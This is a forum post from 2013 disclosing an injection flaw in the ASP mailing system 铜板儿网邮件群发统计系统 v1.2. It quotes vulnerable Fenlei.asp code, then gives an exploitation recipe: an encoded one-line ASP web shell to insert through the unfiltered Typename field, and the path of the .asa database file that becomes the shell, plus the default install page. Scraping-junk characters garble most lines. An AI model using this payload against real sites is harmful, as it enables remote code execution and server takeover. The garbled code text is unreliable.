找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1946|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
'Fenlei.asp 0 y6 d" G+ ?' k% ^2 A0 S
( P* r* _- Z  v6 c4 a
IF Request.QueryString("Action")="del" Then
+ X4 d! l, }9 P1 G+ f- N5 ~ID=Request.QueryString("ID") . n  n1 ]& {9 y4 ], Q
IF Countss ("tui","Fenlei",ID )<>0 then 1 l4 z) X3 ]& H* b; }
'略
6 }: C9 j; y6 p6 yIF Request.QueryString("Action")="Add" Then & o1 G$ B$ G$ x* `- w' S7 R! i
Tname=Request.Form("Typename")
5 _' r' a: w- W1 F( i  S0 k9 dSet Rs=Server.CreateObject("adodb.Recordset") 3 w" _9 y& K: Q, u: i. @
Sql="Select * From Fenlei Order by id Desc " 4 q8 s& c& f+ s; ^/ R3 x! U
Rs.Open Sql,Conn,1,3 . L  u* G' B6 y' v1 d
Rs.Addnew ' K# t( K0 [, J! \; G# s
Rs("Typename")=Tname
9 R( s1 J( |% Z: N9 U2 |'略
& z4 q' b7 |; A. R7 R8 }+ VSet Rs=Server.CreateObject("adodb.Recordset") 1 O8 F& ^' f8 F
Sql="Select * From Fenlei Order by id Desc "
' W) r0 [7 K1 i+ \# |, o- qRs.Open Sql,Conn,1,1 & L7 {, O6 r: E2 ^6 V8 U
'略
' B! T$ Z: k- j4 c+ ]  R%>
6 r: Z4 b8 j8 b; E: N) { - ?7 f, L$ e' y9 S& \5 q! ^
' i: S* A( b1 L! L8 D

: w3 [4 L( F8 i2 s没有过滤,直接写入数据库。
1 ?. x$ G  L( W1 E! C& T; P
1 U" U5 ^1 ?% t1 f+ k/ a4 C5 K( W$ w$ L利用方法:
! x/ J8 }! i  w  E% d3 I % d; b: q7 t+ Y% r  I6 R: y
插入:┼攠數畣整爠煥敵瑳∨≡┩>9 g: Z) ]1 M6 _. g! g4 }3 d: c
* B+ q% s( @5 W2 g

) B6 r+ n' w9 w' p连接: http://www.xxx.com/###tongbaner.asa
0 |7 U/ x: q" k' v+ e* \'默认安装文件:
& x- b- L7 C9 T  m. @9 Q5 P3 `2 @'install.asp
; \4 O4 M" R9 }) \, I& V
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表